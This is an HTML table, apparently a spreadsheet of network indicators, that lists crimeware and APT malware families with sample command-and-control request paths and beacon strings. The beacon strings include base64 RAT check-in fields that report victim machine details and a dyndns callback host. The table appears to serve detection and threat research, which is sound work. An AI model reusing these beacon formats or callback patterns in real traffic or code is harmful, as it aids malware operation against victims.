x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,\n\nlv|'|'|VHJvamFuX0M0NkY2RTk=|'|'|MARK|'|'|user|'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 ...<br /><br />171.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJDMzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'||'|'|b88ece4c04f706c9717bbe6fbda49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uLi4uLi4uDQpyZWVlZWVkLmR5bmRucy5iaXo6MjUyNTQNCkFwcERhdGENCldpbnJhci5leGUNClRydWUNCkZhbHNlDQpUcnVlDQpGYWxzZQ==0.<br /><br />251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJDMzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,<br /><br />lv|'|'|VHJvamFuX0M0NkY2RTk=|'|'|MARK|'|'|user|'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Chimerka.1 / Refyes.A"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Chimerka.1 / Refyes.A</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/sys.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/sys.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/logos.gif?1f5428=8212640"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/logos.gif?1f5428=8212640</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/down.asp?action=install&u=cpmcpm&p=2366A64BAA384EA6AB9CEF73E8E2BE12&t=7393"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/down.asp?action=install&u=cpmcpm&p=2366A64BAA384EA6AB9CEF73E8E2BE12&t=7393</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/upx/kod.txt?k=123&t=7215"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/upx/kod.txt?k=123&t=7215</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:..............."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:...............</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/config.txt?&t=4593"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/config.txt?&t=4593</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nitedrem"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nitedrem</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fish.jpg?&t=4426"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fish.jpg?&t=4426</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?12da89=12355930"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?12da89=12355930</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/logos.gif?114bbc=9068000"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/logos.gif?114bbc=9068000</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sality"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sality</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/setting.doc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/setting.doc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Torpig /Sinowal miniloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Torpig /Sinowal miniloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Torpig /Sinowal miniloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Torpig /Sinowal miniloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search2?fr=altavista&itag=ody&q=b88d6ce7e9fe419788716298cc747adc%2C93a5d8146fea0bbb&kgs=1&kls=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search2?fr=altavista&itag=ody&q=b88d6ce7e9fe419788716298cc747adc%2C93a5d8146fea0bbb&kgs=1&kls=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?7d456d68729292e9843cb9dde2d2f7b4=34"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?7d456d68729292e9843cb9dde2d2f7b4=34</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EK Popads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Popads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/39ff9ff8c3b603d8eed017df64dd2799.eot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/39ff9ff8c3b603d8eed017df64dd2799.eot</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alina POS v5.6"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Alina POS v5.6</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/duck/push.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/duck/push.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alina POS v5.6"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Alina POS v5.6</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/adobe/version_check.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/adobe/version_check.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alina POS v6.0"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Alina POS v6.0</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/adobe/version_check.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/adobe/version_check.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT (IN)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT (IN)</span></td><td data-sheets-value="[null,2,"Hanove / Tourist"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Hanove / Tourist</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/kamp.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/kamp.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Surtr 2nd Stage DL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Surtr 2nd Stage DL</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Surtr 2nd Stage DL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Surtr 2nd Stage DL</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Surtr Initial GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Surtr Initial GET</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Taleret"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Taleret</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Taleret"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Taleret</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sweet Orange EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sweet Orange EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/in.php?q=WPOChVXlw9QiOTwtCbg+uSk36elyOCiUwI99U0PYxA=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/in.php?q=WPOChVXlw9QiOTwtCbg+uSk36elyOCiUwI99U0PYxA==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ArcomRat / Dokstormac"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">ArcomRat / Dokstormac</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Ardamax keylogger"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Ardamax keylogger</span></td><td data-sheets-value="[null,2,"SMTP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">SMTP</span></td><td data-sheets-value="[null,2,"220 smtp.mail.yahoo.com ESMTP ready\nEHLO DELLXT\n250-smtp.mail.yahoo.com"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220 smtp.mail.yahoo.com ESMTP ready<br />EHLO DELLXT<br />250-smtp.mail.yahoo.com</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Matsnu - MBR wiping ransomware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Matsnu - MBR wiping ransomware</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/f44/myse.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/f44/myse.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Mutopy Downloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mutopy Downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/d/conh11.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/d/conh11.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Mutopy Downloader initial callback"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mutopy Downloader initial callback</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Symmi Remote File Injector"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Symmi Remote File Injector</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/img/seek.cgi?lin=100&db=dfs\n/ae1.php\n/ggu.php\n/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/img/seek.cgi?lin=100&db=dfs<br />/ae1.php<br />/ggu.php<br />/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Matsnu - MBR wiping ransomware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Matsnu - MBR wiping ransomware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458&stat=0&ver=2000803&loc=0x0409&os=Windows%20XP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458&stat=0&ver=2000803&loc=0x0409&os=Windows%20XP</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Adware Hotbar"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Adware Hotbar</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/vic.aspx?ver=4.0.1158.0&rnd=595937"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/vic.aspx?ver=4.0.1158.0&rnd=595937</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blackhole v2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackhole v2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"USteal.D"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">USteal.D</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"220---------- Welcome to Pure-FTPd ----------"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220---------- Welcome to Pure-FTPd ----------</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Hangover Smackdown Minapro"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Hangover Smackdown Minapro</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cutwail / Pushdo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cutwail / Pushdo</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mediana Proxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mediana Proxy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/orders2010.php \n/busted.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/orders2010.php <br />/busted.php</span></td></tr>
